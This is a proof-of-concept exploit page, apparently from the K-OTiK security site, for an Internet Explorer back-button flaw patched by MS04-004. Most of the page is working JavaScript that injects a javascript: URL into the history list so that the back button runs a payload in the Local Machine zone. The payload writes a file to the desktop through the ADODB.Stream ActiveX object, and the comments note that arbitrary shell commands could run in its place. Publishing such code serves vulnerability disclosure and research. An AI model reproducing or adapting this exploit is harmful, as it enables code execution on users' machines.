Internet Explorer url javascript injection in history list (MS04-004)

    
 
// Andreas Sandblad, 2004-02-03, patched by MS04-004

                              // Name:     payload
                              // Purpose:  Run payload code called from Local Machine zone.
                              //           The code may be arbitrary such as executing shell commands.
                              //           This demo simply creates a harmless textfile on the desktop.
                              function payload() {
                              file = "sandblad.txt";
                              o = new ActiveXObject("ADODB.Stream");
                              o.Open();
                              o.Type=2;
                              o.Charset="ascii";
                              o.WriteText("You are vulnerable!");
                              o.SaveToFile(file, 2);
                              o.Close();
                              alert("File "+file+" created on desktop!");
                              }

                              // Name:     trigger
                              // Purpose:  Inject javascript url in history list and run payload
                              //           function when the user hits the backbutton.
                              function trigger(len) {
                              if (history.length != len)
                              payload();
                              else
                              return "-";
                              }

                              // Name:    backbutton
                              // Purpose: Run backbutton exploit.
                              function backbutton() {
                              location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
                              }

                              // Launch backbutton exploit on load
                              if (confirm("Press OK to run backbutton exploit!"))
                              backbutton();
                              
                              

 Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits